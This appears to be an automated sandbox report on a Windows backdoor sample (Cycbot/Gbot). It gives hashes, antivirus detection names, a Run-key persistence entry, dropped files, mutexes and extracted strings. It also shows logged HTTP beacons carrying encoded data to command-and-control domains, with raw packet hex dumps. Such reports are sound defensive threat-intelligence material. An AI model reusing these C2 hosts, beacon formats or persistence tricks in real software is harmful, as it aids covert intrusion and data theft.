Analysis Date2014-08-18 19:25:06
MD5bbbc5c0703c2486161f6dd1b39a96f8a
SHA1a213dd14312c0f88a84597214b14607e29666d02

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: aec0dfa559dfbaf8943b868b7a945f54 sha1: 2f943354c7ae2c87150a5215f26512d3cad23da1 size: 112128
Section.rdata md5: ca1c2483f4251d79514b8a9704ca62a9 sha1: b5ff276461b36ca11f51d106a82cc41c32b20adf size: 1024
Section.data md5: 0e2c4f975877e377410c20674ede2992 sha1: c9e49f17d9e220c45478ff892bfc7285852aef39 size: 65536
Section.reloc md5: 6c049ccde09ec50966650baf76f3152b sha1: cc08eb61aa6977458d72a3143363a529f8822df5 size: 1024
Timestamp2005-09-04 09:12:58
PEhash29b187b45952a97b7bb54733bd07f5c62bdbbb53
IMPhash62022e4720e987339d9fc03f1547b7c4
AV360 SafeGen:Heur.Conjar.5
AVAd-AwareGen:Heur.Conjar.5
AVAlwil (avast)Cybota [Trj]
AVArcabit (arcavir)no_virus
AVAuthentiumW32/Goolbot.K.gen!Eldorado
AVAvira (antivir)TR/Crypt.ZPACK.Gen
AVCA (E-Trust Ino)Win32/FakeAlert.J!generic
AVCAT (quickheal)Backdoor.Cycbot.B
AVClamAVWin.Trojan.Cycbot-1508
AVDr. WebBackDoor.Gbot.69
AVEmsisoftGen:Heur.Conjar.5
AVEset (nod32)Win32/Kryptik.TFW
AVFortinetW32/Kryptik.SMY!tr.bdr
AVFrisk (f-prot)W32/Goolbot.K.gen!Eldorado (generic, not disinfectable)
AVF-SecureRogue:W32/OpenCloud.A
AVGrisoft (avg)Win32/Cryptor
AVIkarusBackdoor.Win32.Cycbot
AVK7Backdoor ( 003210941 )
AVKasperskyTrojan.Win32.Generic
AVMalwareBytesBackdoor.Bot
AVMcafeeBackDoor-EXI.gen.n
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicroWorld (escan)Gen:Heur.Conjar.5
AVNormanwin32/Gbot.AX
AVRisingBackdoor.Win32.Cycbot.a
AVSophosMal/FakeAV-IS
AVSymantecTrojan.Gen.2
AVTrend MicroBKDR_CYCBOT.SME3
AVVirusBlokAda (vba32)BScope.DeadCryptor.01597
AVYara APTno_virus
AVZillya!Trojan.Jorik.Win32.17115

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\conhost ➝
C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates Mutex{A5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex{5A92A751-F926-4BB9-872E-BEC4A4CD571F}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex{B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNSgreenherbalteaonline.com
Winsock DNS127.0.0.1
Winsock DNSyourmediaresources.com
Winsock DNSyourblogresources.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\65e7_appcompat.txt
Creates FilePIPE\lsarpc
Creates ProcessC:\WINDOWS\system32\dwwin.exe -x -s 196

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\2e1d_appcompat.txt
Creates FilePIPE\lsarpc
Creates ProcessC:\WINDOWS\system32\drwtsn32 -p 112 -e 152 -g
Creates ProcessC:\WINDOWS\system32\dwwin.exe -x -s 196

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\WINDOWS\system32\dwwin.exe -x -s 196

Process
↳ C:\WINDOWS\system32\dwwin.exe -x -s 196

Process
↳ C:\WINDOWS\system32\drwtsn32 -p 112 -e 152 -g

Network Details:

DNSgreenherbalteaonline.com
Type: A
141.8.225.80
DNSzonedg.com
Type: A
141.8.225.80
DNSzonedg.com
Type: A
141.8.225.80
DNSonlinesearchdb.com
Type: A
DNSyourblogresources.com
Type: A
DNSyourmediaresources.com
Type: A
HTTP GEThttp://greenherbalteaonline.com/images/greenherbalteagirlholdingcup350.gif?v22=34&tq=gHZutDyMv5rJejPia9nrmsl6giWz%2BJZbVyA%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8yjYvEaS%2FT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqpSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B82uYvEaS%2FT%2Bsq9Sr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8yjYvEaSPT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqlSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
Flows TCP192.168.1.1:1031 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1034 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1035 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1036 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1037 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1038 ➝ 141.8.225.80:80

Raw Pcap
0x00000000 (00000)   47455420 2f696d61 6765732f 67726565   GET /images/gree
0x00000010 (00016)   6e686572 62616c74 65616769 726c686f   nherbalteagirlho
0x00000020 (00032)   6c64696e 67637570 3335302e 6769663f   ldingcup350.gif?
0x00000030 (00048)   7632323d 33342674 713d6748 5a757444   v22=34&tq=gHZutD
0x00000040 (00064)   794d7635 724a656a 50696139 6e726d73   yMv5rJejPia9nrms
0x00000050 (00080)   6c366769 577a2532 424a5a62 56794125   l6giWz%2BJZbVyA%
0x00000060 (00096)   33442048 5454502f 312e300d 0a436f6e   3D HTTP/1.0..Con
0x00000070 (00112)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x00000080 (00128)   486f7374 3a206772 65656e68 65726261   Host: greenherba
0x00000090 (00144)   6c746561 6f6e6c69 6e652e63 6f6d0d0a   lteaonline.com..
0x000000a0 (00160)   41636365 70743a20 2a2f2a0d 0a557365   Accept: */*..Use
0x000000b0 (00176)   722d4167 656e743a 206d6f7a 696c6c61   r-Agent: mozilla
0x000000c0 (00192)   2f322e30 0d0a0d0a                     /2.0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735376 54357775 67253242 74796766   VsSvT5wug%2Btygf
0x00000040 (00064)   764f3748 33334868 626a2532 46683773   vO7H33Hhbj%2Fh7s
0x00000050 (00080)   62656466 31735376 54387436 35693968   bedf1sSvT8t65i9h
0x00000060 (00096)   6c4c3950 6d787158 48306246 2532466d   lL9PmxqXH0bF%2Fm
0x00000070 (00112)   694d5772 64506435 534f6569 6b4c3530   iMWrdPd5SOeikL50
0x00000080 (00128)   6742394b 35504c4e 71336546 476a7a68   gB9K5PLNq3eFGjzh
0x00000090 (00144)   25324638 44644159 64725435 574f3061   %2F8DdAYdrT5WO0a
0x000000a0 (00160)   6c787479 67627062 3648766e 53414f51   lxtygbpb6HvnSAOQ
0x000000b0 (00176)   696a2532 4238796a 59764561 53253246   ij%2B8yjYvEaS%2F
0x000000c0 (00192)   54253242 73717453 72253246 65253242   T%2BsqtSr%2Fe%2B
0x000000d0 (00208)   56355a75 52672533 44253344 20485454   V5ZuRg%3D%3D HTT
0x000000e0 (00224)   502f312e 310d0a48 6f73743a 207a6f6e   P/1.1..Host: zon
0x000000f0 (00240)   6564672e 636f6d0d 0a557365 722d4167   edg.com..User-Ag
0x00000100 (00256)   656e743a 206d6f7a 696c6c61 2f322e30   ent: mozilla/2.0
0x00000110 (00272)   0d0a436f 6e74656e 742d4c65 6e677468   ..Content-Length
0x00000120 (00288)   3a20300d 0a436f6e 6e656374 696f6e3a   : 0..Connection:
0x00000130 (00304)   20636c6f 73650d0a 0d0a                 close....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735376 54357775 67253242 74796766   VsSvT5wug%2Btygf
0x00000040 (00064)   764f3748 33334868 626a2532 46683773   vO7H33Hhbj%2Fh7s
0x00000050 (00080)   62656466 31735376 54387436 35693968   bedf1sSvT8t65i9h
0x00000060 (00096)   6c4c3950 6d787158 48306246 2532466d   lL9PmxqXH0bF%2Fm
0x00000070 (00112)   694d5772 64506435 534f6569 6b4c3530   iMWrdPd5SOeikL50
0x00000080 (00128)   6742394b 35504c4e 71336546 476a7a68   gB9K5PLNq3eFGjzh
0x00000090 (00144)   25324638 44644159 64725435 574f3061   %2F8DdAYdrT5WO0a
0x000000a0 (00160)   6c787479 67627062 3648766e 53414f51   lxtygbpb6HvnSAOQ
0x000000b0 (00176)   696a2532 42384f6f 59764561 53505425   ij%2B8OoYvEaSPT%
0x000000c0 (00192)   32427371 70537225 32466525 32425635   2BsqpSr%2Fe%2BV5
0x000000d0 (00208)   5a755267 25334425 33442048 5454502f   ZuRg%3D%3D HTTP/
0x000000e0 (00224)   312e310d 0a486f73 743a207a 6f6e6564   1.1..Host: zoned
0x000000f0 (00240)   672e636f 6d0d0a55 7365722d 4167656e   g.com..User-Agen
0x00000100 (00256)   743a206d 6f7a696c 6c612f32 2e300d0a   t: mozilla/2.0..
0x00000110 (00272)   436f6e74 656e742d 4c656e67 74683a20   Content-Length: 
0x00000120 (00288)   300d0a43 6f6e6e65 6374696f 6e3a2063   0..Connection: c
0x00000130 (00304)   6c6f7365 0d0a0d0a 20737563 68206669   lose.... such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735376 54357775 67253242 74796766   VsSvT5wug%2Btygf
0x00000040 (00064)   764f3748 33334868 626a2532 46683773   vO7H33Hhbj%2Fh7s
0x00000050 (00080)   62656466 31735376 54387436 35693968   bedf1sSvT8t65i9h
0x00000060 (00096)   6c4c3950 6d787158 48306246 2532466d   lL9PmxqXH0bF%2Fm
0x00000070 (00112)   694d5772 64506435 534f6569 6b4c3530   iMWrdPd5SOeikL50
0x00000080 (00128)   6742394b 35504c4e 71336546 476a7a68   gB9K5PLNq3eFGjzh
0x00000090 (00144)   25324638 44644159 64725435 574f3061   %2F8DdAYdrT5WO0a
0x000000a0 (00160)   6c787479 67627062 3648766e 53414f51   lxtygbpb6HvnSAOQ
0x000000b0 (00176)   696a2532 42387976 55712532 4633766c   ij%2B8yvUq%2F3vl
0x000000c0 (00192)   6557626b 59253344 20485454 502f312e   eWbkY%3D HTTP/1.
0x000000d0 (00208)   310d0a48 6f73743a 207a6f6e 6564672e   1..Host: zonedg.
0x000000e0 (00224)   636f6d0d 0a557365 722d4167 656e743a   com..User-Agent:
0x000000f0 (00240)   206d6f7a 696c6c61 2f322e30 0d0a436f    mozilla/2.0..Co
0x00000100 (00256)   6e74656e 742d4c65 6e677468 3a20300d   ntent-Length: 0.
0x00000110 (00272)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000120 (00288)   73650d0a 0d0a2020 3c2f626f 64793e0a   se....  </body>.
0x00000130 (00304)   3c2f6874 6d6c3e0a 0d0a                </html>...

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735376 54357775 67253242 74796766   VsSvT5wug%2Btygf
0x00000040 (00064)   764f3748 33334868 626a2532 46683773   vO7H33Hhbj%2Fh7s
0x00000050 (00080)   62656466 31735376 54387436 35693968   bedf1sSvT8t65i9h
0x00000060 (00096)   6c4c3950 6d787158 48306246 2532466d   lL9PmxqXH0bF%2Fm
0x00000070 (00112)   694d5772 64506435 534f6569 6b4c3530   iMWrdPd5SOeikL50
0x00000080 (00128)   6742394b 35504c4e 71336546 476a7a68   gB9K5PLNq3eFGjzh
0x00000090 (00144)   25324638 44644159 64725435 574f3061   %2F8DdAYdrT5WO0a
0x000000a0 (00160)   6c787479 67627062 3648766e 53414f51   lxtygbpb6HvnSAOQ
0x000000b0 (00176)   696a2532 42383275 59764561 53253246   ij%2B82uYvEaS%2F
0x000000c0 (00192)   54253242 73713953 72253246 65253242   T%2Bsq9Sr%2Fe%2B
0x000000d0 (00208)   56355a75 52672533 44253344 20485454   V5ZuRg%3D%3D HTT
0x000000e0 (00224)   502f312e 310d0a48 6f73743a 207a6f6e   P/1.1..Host: zon
0x000000f0 (00240)   6564672e 636f6d0d 0a557365 722d4167   edg.com..User-Ag
0x00000100 (00256)   656e743a 206d6f7a 696c6c61 2f322e30   ent: mozilla/2.0
0x00000110 (00272)   0d0a436f 6e74656e 742d4c65 6e677468   ..Content-Length
0x00000120 (00288)   3a20300d 0a436f6e 6e656374 696f6e3a   : 0..Connection:
0x00000130 (00304)   20636c6f 73650d0a 0d0a3437 39203637    close....479 67
0x00000140 (00320)   36323730 36322033 36343837 36366520   627062 3648766e 
0x00000150 (00336)   35333431 34663531 2020206c 78747967   53414f51   lxtyg
0x00000160 (00352)   62706236 48766e53 414f510a            bpb6HvnSAOQ.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735376 54357775 67253242 74796766   VsSvT5wug%2Btygf
0x00000040 (00064)   764f3748 33334868 626a2532 46683773   vO7H33Hhbj%2Fh7s
0x00000050 (00080)   62656466 31735376 54387436 35693968   bedf1sSvT8t65i9h
0x00000060 (00096)   6c4c3950 6d787158 48306246 2532466d   lL9PmxqXH0bF%2Fm
0x00000070 (00112)   694d5772 64506435 534f6569 6b4c3530   iMWrdPd5SOeikL50
0x00000080 (00128)   6742394b 35504c4e 71336546 476a7a68   gB9K5PLNq3eFGjzh
0x00000090 (00144)   25324638 44644159 64725435 574f3061   %2F8DdAYdrT5WO0a
0x000000a0 (00160)   6c787479 67627062 3648766e 53414f51   lxtygbpb6HvnSAOQ
0x000000b0 (00176)   696a2532 4238796a 59764561 53505425   ij%2B8yjYvEaSPT%
0x000000c0 (00192)   32427371 74537225 32466525 32425635   2BsqtSr%2Fe%2BV5
0x000000d0 (00208)   5a755267 25334425 33442048 5454502f   ZuRg%3D%3D HTTP/
0x000000e0 (00224)   312e310d 0a486f73 743a207a 6f6e6564   1.1..Host: zoned
0x000000f0 (00240)   672e636f 6d0d0a55 7365722d 4167656e   g.com..User-Agen
0x00000100 (00256)   743a206d 6f7a696c 6c612f32 2e300d0a   t: mozilla/2.0..
0x00000110 (00272)   436f6e74 656e742d 4c656e67 74683a20   Content-Length: 
0x00000120 (00288)   300d0a43 6f6e6e65 6374696f 6e3a2063   0..Connection: c
0x00000130 (00304)   6c6f7365 0d0a0d0a 0d0a                lose......

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735376 54357775 67253242 74796766   VsSvT5wug%2Btygf
0x00000040 (00064)   764f3748 33334868 626a2532 46683773   vO7H33Hhbj%2Fh7s
0x00000050 (00080)   62656466 31735376 54387436 35693968   bedf1sSvT8t65i9h
0x00000060 (00096)   6c4c3950 6d787158 48306246 2532466d   lL9PmxqXH0bF%2Fm
0x00000070 (00112)   694d5772 64506435 534f6569 6b4c3530   iMWrdPd5SOeikL50
0x00000080 (00128)   6742394b 35504c4e 71336546 476a7a68   gB9K5PLNq3eFGjzh
0x00000090 (00144)   25324638 44644159 64725435 574f3061   %2F8DdAYdrT5WO0a
0x000000a0 (00160)   6c787479 67627062 3648766e 53414f51   lxtygbpb6HvnSAOQ
0x000000b0 (00176)   696a2532 42384f6f 59764561 53505425   ij%2B8OoYvEaSPT%
0x000000c0 (00192)   32427371 6c537225 32466525 32425635   2BsqlSr%2Fe%2BV5
0x000000d0 (00208)   5a755267 25334425 33442048 5454502f   ZuRg%3D%3D HTTP/
0x000000e0 (00224)   312e310d 0a486f73 743a207a 6f6e6564   1.1..Host: zoned
0x000000f0 (00240)   672e636f 6d0d0a55 7365722d 4167656e   g.com..User-Agen
0x00000100 (00256)   743a206d 6f7a696c 6c612f32 2e300d0a   t: mozilla/2.0..
0x00000110 (00272)   436f6e74 656e742d 4c656e67 74683a20   Content-Length: 
0x00000120 (00288)   300d0a43 6f6e6e65 6374696f 6e3a2063   0..Connection: c
0x00000130 (00304)   6c6f7365 0d0a0d0a                     lose....


Strings
<
..y
..
 
,.lU.{
.
f...
..
080904b0
1.0.0.1
1994
FileVersion
&find
&Find any        Alt+F
PrivateBuild
ProductVersion
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
```````
``      
^^^^^^
^^^^^^^^^^^
^^^^^^^^^^^^^^
~~~~~\
<<<<<<
>>>>>>>>//////////////
----------
-.......
,,,,,,,,,,,,,,,,,,,
,,,###
;;;;;;;;;;;
;;;;;;;;;;;;;
?+++++++
///////
.......
.........
.@@~{/
''?????
))))))
))))))))))))):::::::
](   @
$$$$$$$$
$$$$$$$$$
*********
&&&&&&&&
&&&&&&&&(((((
&&&&&&&&&
######
#######
%%%%%%%
%%%%%%%%%%
++++++
+++++++
++++++++
++++++++++
						
													
00000000
0100 K
(@ 06`1
0[=e4_t
0ENE=H
0<!hgS0:
0>}XQ]
1111111
1111111111111
18sAtc
1C1THf
1K:T:L* 
1\Kv{N
1MyK;B
1|SIW^s
2[[}}}}}}
22222222
222222220
22222222222RRCC
22222PPPP
$$$$$$$$$$$$22uuuuuuuuuuuuCCCCCCCCCCCCCCCC
24,Ods2
:2>cNM
@]2Lcy
@$ @2N!
2U;Uf9>
333333
3333332222
33333333--
 3b	e)
@$@ 3{fj
3pk?j8
3\+?VA
:3ynkfV
444UUUUUUUUUUUUUUUUAAAA
?48.4$
4:M\M\
@|4Za1
5555555555
555555555555555555
`5d&;]\
``5fy\
5G@ @`?
5h.dll
5L-{D'
`-5n:)
5.@@ne
5PgiVH
5`Pv/h
` 6{+47
6.m&7f 
6%vJ5.
?7)22'
8(  " 
88JJJ&&BBBBBBBBNNN
89*yfWf
8fpYo~
8Jln}8
97BBh(`
9a&z\y
a03cBS
aaaaaaa
aaaaaaaa
AAAAAAAAA
aaaaaaaaaaaaaaaaaaaaaaaa
((aaaaaaaaaKKKKKKKKKKKKKKKK
AAA$$$$$$RRyyyyyyyyyyy
AcbsG,b
:agbE^
AotNue
 apqJi
~-a'qM
Ar7gPl
aSTwWy9
aV`C=g
*` Ax1"
aX#w(`
bbbbbbbbbbbbb
`bcs @ =kc
}birD>0
b!L$ex/
b.@@M@h(
}BQA>H{
"``bTS7
B}u\zZ
+~	Bvm
b`W+E$
C}}*@`[;
C70\h]
'-c<9y
@CA+by
@*@ Cb1
CCCCCC
ccccccccc
CGB>l|
C} K`b+
ClipCursor
c^nB_uckr
%%C<oH
`cpxtOW&
CreatePopupMenu
C:t|d*
D6I,@@.
dAAAAA]]]]]]
@.data
d'}Cpr
dddddddddd
ddddqqqqq
Dd{F4cD
DestroyMenu
dEx*` 
"@`Dh!
$ dKGY
`Dmxzz
DuplicateHandle
d.>v4BE
>Dv6.|
.')e2W
E/3~[m
e}%9Vw
Ec-.@@
eCePk]
EEEEEE
ef.Arf
E{?I5p
EnumResourceNamesW
`|eNxi
]}eQ@U
E-r;cc
  ,``F$
{f6w:Cf
f8+jAi<r
fff|||
FFFFFFFFFFFFFFFFFFF
+fHNKU`8
FindClose
FindFirstFileA
FindResourceExA
FindWindowA
FlushInstructionCache
`f==lX
F)):'u
	fWD:v
)?{G%9
GetDesktopWindow
GetModuleFileNameW
;/#gFn%2
@gG@_>
GGGGGGGGF
ggggggggg
GGGGGGGGGGG
GGGGGQQ
gggooooo
@`gHK%
@G%k(`
gktED-
Gv9^LTa
^H/4"@
 @`=ha
h!_/a,@`
. `HC?^
H`dX]>%3H2_
hhhh88
HHHHHz
 h_JJY
!hpv2'
HS. @-
Hun9II
H$@ :z
 Ig={A
I=~gbLm
????????????III
IIIIIIIIIIII,,,,,,,,,
Il~c$@`
ILH`q_3
\;i#>m;
-IZ!#-s
j=!,` +
@ J_&`
{j9>@E0
J'BBkmje
`JE070
jI=^siH@|
jjdddddd;;
jjjjjjjjjjjjjjjj
" `J)m
`j\Ntu
@>jOQ;
J:Q{?[
Jq~Je)
@J?vms
,@@Jx=
`'k	0N
#'_Ke?
KERNEL32.dll
kF3v& 
KJkT_]
KKKKKKKK
kkkkkkkkkkkkkkkkkk
KKKKKKKKKKKKKKKKMMM
k;sKhp
L0ht%[Iq
 `L0yvW{F,
Ld40/P
L_^Eo4
/Lf7EP
lllllllllllllll
 `LnIu
lqBegE
lS~A_bv
L! ` t
lTR& `
$ @&@ m
MapViewOfFile
MBn`1L
mF{<*`
mJN`)D{w
+M@K]v,
MMMMMM88888888
MMMMMMM
mmmmmmmm
MMMMMMMMM
MMMMMMMMMMMMMMMMMM
Mn"`@&@
];mP(@@
Mq6?Mq
@/M;uQ
m'}v.`@
MxBh9GgJ
` N<,` 
NBMS'L
NdrFixedArrayFree
N\E;AI
@;NFv>
^NIMDh
NLT-RK
NNNNNN
NNNNNNNNNNNNNN
nnnnnnnTTT
':NrE?3
@"NSmU
 @NsOb
NsS+!$ 
nZ+!Aer
Nz\O"W
,-=O#1
`o4<.@
;_Od,@
O+DiuwsX
OfZ9/x0b
~o.H{&\L
OLSI^{
ooo$$$$$
ooobbb
!!!!!!OOOOOO
OOOOOOOOO
OOOOOOOOOO
ooooooooooo
]|OPnYos
O' <qb
o@qc3c
 `OrUzw
 OsPm*
owH?fM.
ox3B%i
@#P$``
#pd\a8+c
\pG@eo	n
'PLiwj
ppp=======
PPPPPP
PPPPPPPPPP
PPPPPPPPPPPPPPPP4444444
~*~P{Q
PsRuPw`
PT#5k7
* `>	pu
@`@p`w.
 @q>1x
q! 5uL
Q[9bsC
Qc^@, 
 `Q~gab^
qII72~
>qjQXsB}
q(@@KA
;Ql\'D
qMl{1]
QmZ|`(``G
Q~O7}*
&&&&&&&&QQQQQ
QQQQQQQQ
qqqqqqqqq
QRLRZGACd
*@`QYu
Q`zGge
R5BgUUQ
rAymUVk
``|RC6
RcKV,S/aP{
`.rdata
RedrawWindow
.reloc
REOo<a
R/+EVj
!RJR\d
R?]km|
R=`nc3T
RPCRT4.dll
rrrrrrr_
RRRRRRRRRRRRRRRRRRRggggg
 `RZ7&
&)S1{=a
sBD@`D
SetEnvironmentVariableW
SHELL32.dll
Shell_NotifyIconA
ShvWhD
sKHlo0
SOg7	r
SoGtst
SQ4M"gIZ
sq|Dk,
SQTiXTs
ssssssss
ssssssss|||||||||||||||||,,,,,,,,,,,HH
sssssssss
SSSSSSSSS
sssssssssG
sXc|Y0,
<$@@~;t
T10ZnfP
T6#S!!
!This program cannot be run in DOS mode.
timeEndPeriod
TrackPopupMenuEx
#tR!*#eB&
*******tt
___tttt
tttttt
tttttttttt------
TTTTTTTTTTT
t<?&``Xu;
U\\\\\
U9"jmc
UBbqYS
Uj^!zE~
{uL`/Z
UnmapViewOfFile
u )`Q}
USER32
UuidCreate
UUUUU%
UUUUULLLL
{u`?w?
&	u>WKV
	v\~+A*`
v=Chx,y
`Vok\h& `
]vPgEG
Vt#iG;
Vv/D-Q
[[[[[[[[^^^VVV
$$$vvvv66
vvvvvv~~
VVVVVVV
vvvvvvvvvv
V^WIc*
	W4	KN
W5>{TmN(
``W?7v
wF1\cz$S
WhcN@iE
whm)$ @WG:
WINMM.dll
wk-%N-
$  wnb
)WN	Oh
wpeee*****
@@wS%_yax#
:wtL|az
{x%2mbP
XA='LtD
[/XH=h>
Xl`msg>
xm.}Ze
+XXXXXX
xxxxxxx
XXXXXXX
xxxxxxxxx
XXXXXXXXXXXXX"
(Y4W<F
y|4wZM
 y6KiJ
Y*7DSO
'#y9=m
YAt"p1bq
Yfh{  `
YJ^3HD
Ylq5^[
yooSSSSSSSSS
ypz7#_
`Yr0}6
''''~~YY
YY++++++
YYYNNN
YYYYYY
`   _z
/Z08%}OR
@ Z36J
zaPf)Ry
zETzY~
@@zMR&
@Znc3@
zP=Z8?T
zQfiXy
 `zsC]l
zTu-z1q
zyZ.uJ
Z`ZqXG
''''zzzzzzz
ZZZZZZZ
zzzzzzzzzzz
ZZZZZZZZZZZ))))